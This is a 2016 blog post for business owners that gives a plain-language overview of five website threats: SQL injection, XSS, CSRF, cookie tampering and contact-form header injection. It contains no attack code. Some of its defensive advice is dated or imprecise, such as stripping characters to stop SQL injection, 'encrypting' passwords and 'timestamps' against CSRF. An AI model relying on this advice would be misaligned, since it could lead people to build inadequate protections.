Sep 05, 2016
Website security can be a big problem for businesses. Your website faces the threat of attack from hundreds of different sources; and without the proper action, you’re likely to find your website breached, and your data compromised.
These 5 website security issues are some of the most dangerous threats facing your website. As well as causing catastrophic harm, they have the potential to slip under your radar – and with thousands of businesses making web application security mistakes every year, its time you took action to protect your website.
In order for visitors to browse, login and purchase products, business websites rely on large databases of stored information. These databases typically contain user IDs, login credentials, payment information and a whole host of other sensitive data. In order to access and use this data, your website uses a special programming language, known as Structured Query Language (or SQL).
Despite being an essential programming language, SQL is commonly abused by malicious third-parties. SQL commands can sometimes be ‘injected’ into your website through poorly-secured forms. These commands can be used to delete vast swathes of customer data, steal payment information or insert thousands of spam-ridden links into your website.
As long as you’re aware of the problem, it’s relatively easy to avoid succumbing to SQL injection. By preventing certain characters from being used in user submitted messages (for example / \ ‘ or “), SQL commands can be prevented from executing (a process known as sanitisation). Crucial data (like passwords and payment information) can also be encrypted, preventing its use in those fields.
Cross-site scripting (also known as XSS) is a technique that allows hackers to embed malicious script into a website page – most commonly through a Comment form. This script is then executed by the web browser of any legitimate users who view the page; causing their browser to perform a malicious action.
Cross-Site Request Forgery
Cross-site request forgery (also known as XSRF) is used to trigger a malicious action from a user that is currently logged-in to your website.
There are two stages to these attacks. Logged-in users of the target site need to be attracted to a malicious website; and once there, code on the website causes the user’s browser to perform a malicious action on the target website, using their authority as a logged-in user to post spam comments or collect sensitive data.
This problem can be remedied by issuing your users with unique digital timestamps. When a logged-in user attempts to perform an action on your website, this timestamp has to be validated – ensuring that the request originated from your website, and not a third-party.
Cookies play a vital role in modern website development. They allow users to log in to your website, stay logged-in as they browse, and engage with personalised offers and promotions. They also play an essential role in ecommerce sites, tracking items in a user’s shopping basket and tallying product prices.
Whilst cookies are a vital tool in a developer’s arsenal, they also present a serious risk for your website. Cookies can be tampered with by malicious third-parties; and if your website has no means of checking and validating submitted cookies, serious damage can be caused to your site.
Ecommerce systems can be crippled by cookie tampering, with third-parties able to edit the price of items before checking out, or login as another user. As a result, it’s essential to ensure that your website can check the legitimacy of cookies. It’s also a great idea to avoid storing sensitive information, like users IDs and passwords, in cookie format.
Email Form Header Injection
Contact forms are another popular web development tool – but they aren’t without their own set of problems. Contact forms are used to convert user inputted messages into email; but if malicious code is inputted to a form, it becomes possible to hijack the form to send huge volumes of spam email.
Your contact form can be redirected to send these spam messages to external email accounts, and not your own internal email. This can quickly lead to your website, email address and server becoming blacklisted for spam activity.
To protect against this, your contact forms need to screen all user input – and when malicious code is detected, it needs to be removed.